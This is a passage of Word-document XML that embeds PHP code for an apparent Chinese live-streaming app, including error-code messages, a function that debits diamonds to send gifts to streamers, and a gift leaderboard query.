        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三天前的录播不能生成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393AA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230A49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1005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA59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无效的开始录播时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开始时间不能在最后一次调用时间之前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805CF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71E5F9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2001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F79A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无效的主播室</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670BFE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522A6D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2002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B7FC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主播室不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D683A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529917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2003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563291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'room password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E45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57977A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2004:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B86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'room password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA20F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034B72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2005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C48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'roomName</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526BC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4A12F0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2007:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8A6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聊天室</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08129F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4D8538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2008:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6C98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'thirdRoomId</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E89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1F5EC4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2009:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11950A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人数已满</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD1B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7AC6E20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20010:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD94D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控制房间流状态失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B957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2EF182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20011:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02233A5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房间数超过上限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户没有认证时会有该限制</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8144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262979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case 20013:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E18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没有直播回看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23783F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573B96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3001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240081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用户账户已过期</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428339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3F4890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3003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE59C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暂停服务</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8D5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040D2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3004:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D180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'appkey</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B27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5A9D07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3005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554272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旧密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改密码时要做旧密码验证</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71254B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3EC6AB3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3006:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2C8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域名没有</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cname,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自有域名绑定时要检查域名是否</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cname';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF25D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105A6A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4001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB740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附件重复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F8C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290C42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5002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CFF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点播视频上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1496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7C89FF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8001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B16A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图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41FAF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7D4487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8003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492163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房间分享图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210265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740CA9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8005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBEE1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房间封面图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79FD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690063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8007:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF289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主播室水印图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499337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9001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB843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直播记录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C73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37AC1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9002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605984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无效的直播记录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654105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13001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A866F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时间格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274C4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34980D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14001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485853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导出文件上传文件服务器失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F980B2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14002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1A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导出文件生成中</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3F51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5E6D1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15001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4B9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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传礼品图片失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CEFE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15002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BEC4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$text = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无效的礼品</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">id / </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除礼品图片失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047409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              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292E1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default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D131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$text = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C88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1CAF1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9DDC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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>码：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$id.', '.$text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F753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1E14B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liwu_money(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B2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$id         =   input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE275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$uid_zhu    =   input('uid_zhu/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702962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if(!$id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB372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json(['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453402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774395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if(!$uid_zhu){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7523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主播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7AA3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4DCB8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if($uid_zhu == $this-&gt;member['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC9A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不能给自己送礼物</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0AA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8BB5AD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$member_zhibo_liwu = Db::name('member_zhibo_liwu')-&gt;cache(true)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66986A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if(!$member_zhibo_liwu){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002887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json(['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>礼物已被删除，请重新打开</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDB31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2FC2C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if(!$this-&gt;member['zhibo_zuan'] || $this-&gt;member['zhibo_zuan'] &lt; $member_zhibo_liwu['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3128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钻石不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF95B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377C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$this-&gt;member['id'])-&gt;setDec('zhibo_zuan', $member_zhibo_liwu['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7413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Db::name('member')-&gt;where('id', $uid_zhu)-&gt;setInc('zhibo_zuan', $member_zhibo_liwu['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D5C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$map['uid']     =   $this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF005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$map['uid_zhu'] =   $uid_zhu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AF41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$map['money']   =   $member_zhibo_liwu['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561405B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$map['liwu_id'] =   $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592CA0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$map['time']    =   time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022292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 = Db::name('member_zhibo_liwu_list')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59916B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3ADAA44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json(['ret'=&gt;$db,'money'=&gt;$map['money']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD18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6D0B593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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>礼物发送失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B4A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1FC6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2117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public function phb(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099CE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 input('type/d') ? input('type/d') : 1;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787D7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 input('uid/d') ? input('uid/d') : 0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415BE3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39D5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json(['err'=&gt;'uid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB36F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4B6E6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$join   =   [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBC5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['__MEMBER__ b','a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29834D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D420A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FCE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if($type == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB84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'd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC498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 == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671365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'w';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E238A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 if($type == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BBC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'm';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0203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3A4955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$date = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74C7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D16EF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$where['uid_zhu']   =   $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB94E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if($date){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBD1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Db::name('member_zhibo_liwu_list')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;whereTime('time',$date)-&gt;field('sum(a.money) as money_num,b.id,b.nickname,b.mobile,b.img')-&gt;group('a.uid')-&gt;order('money_num desc')-&gt;limit(50)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E6A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482EBF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 = Db::name('member_zhibo_liwu_list')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;field('sum(a.money) as money_num,b.id,b.nickname,b.mobile,b.img')-&gt;group('a.uid')-&gt;order('money_num desc')-&gt;limit(50)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F66A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0C25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foreach ($data as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88E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if(!$v['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D87630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$data[$k]['nickname']   =   _username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE7B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11412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A1795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json($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE86B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942F6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8FCDB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77BBD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712FC7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_ajaxError($text=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104D8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$text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E277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80288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function getImageInfo($img) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04464A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7A610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$img_info = getimagesize($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5C23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switch ($img_info[2]) {</w:t>
      </w:r>
